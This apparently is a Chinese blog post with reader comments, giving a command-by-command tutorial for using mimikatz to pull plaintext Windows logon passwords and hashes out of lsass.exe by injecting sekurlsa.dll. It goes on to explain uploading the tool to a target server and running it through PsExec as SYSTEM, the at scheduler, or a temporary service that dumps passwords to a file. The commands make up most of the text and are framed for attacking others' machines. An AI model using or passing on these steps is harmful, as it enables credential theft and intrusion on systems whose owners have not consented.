mimikatz是一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限 注入进程 读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器,其强大的功能还有待挖掘。
神器下载地址:
http://blog.gentilkiwi.com/mimikatz
使用方法:
1. 运行主程序:mimikatz.exe
2. 输入:privilege::debug 提升权限
3. 输入:inject::process lsass.exe sekurlsa.dll
将sekurlsa.dll 注入到lsass.exe 中
4. 输入:@getLogonPasswords
即可获取hash和当前用户的明文密码!
下面是我的实验截图,不信自己价格密码获取试试!
在远程终端(3389、mstsc.exe)、虚拟桌面中抓取密码的方法:
通常你在远程终端中运行该程序会提示:存储空间不足,无法处理此命令。
这是因为在终端模式下,不能插入远线程,跨会话不能注入,你需要使用如下方法执行该程序:
首先提取几个文件,只抓取密码的话,只需要这几个文件:
mimikatz_trunktoolsPsExec.exe
mimikatz_trunkWin32mimikatz.exe
mimikatz_trunkWin32sekurlsa.dll
打包后上传至目标服务器,然后解压释放,注意路径中绝对不能有中文(可以有空格)!否则加载DLL的时候会报错:找不到文件。
然后使用以下任何一种方法即可抓取密码:
//最简单实用的方法,使用 PsExec.exe 启动。
//在系统帐户中运行 cmd.exe,或者直接运行 mimikatz.exe
psexec -s cmd.exe
//启动 mimikatz.exe
C:mimikatz_trunkWin32mimikatz.exe
//提升权限
privilege::debug
//注入dll,要用绝对路径!并且路径中绝对不能有中文(可以有空格)!
inject::process lsass.exe "C:mimikatz_trunkWin32sekurlsa.dll"
//抓取密码
@getLogonPasswords
//退出,不要用 ctrl + c,会导致 mimikatz.exe CPU 占用达到 100%,死循环。
exit
//*********************************************************
//使用 At 启动
at ***
//*********************************************************
//创建服务方法
sc create getpassword binpath= "cmd.exe /c c:xxxmimikatz.exe < command.txt > password.txt"
sc start getpassword
sc delete getpassword
//*********************************************************
//telnet 远程命令管道
telnet ****
点谷歌的,一下就可以了
送好吃滴不?送好吃滴我就点,说吧!点击下!10下还是100下!
我勒个去,你点下赞助下我嘛
= =,算了吧!没心情点击那东西!
说实话很讨厌网站的那个图片广告!坏银,写内容就写吧,加什么广告嘛!哎……
@Dr.Rider 网站空间域名费总要挣点的吧!你进来就顺便点击一下!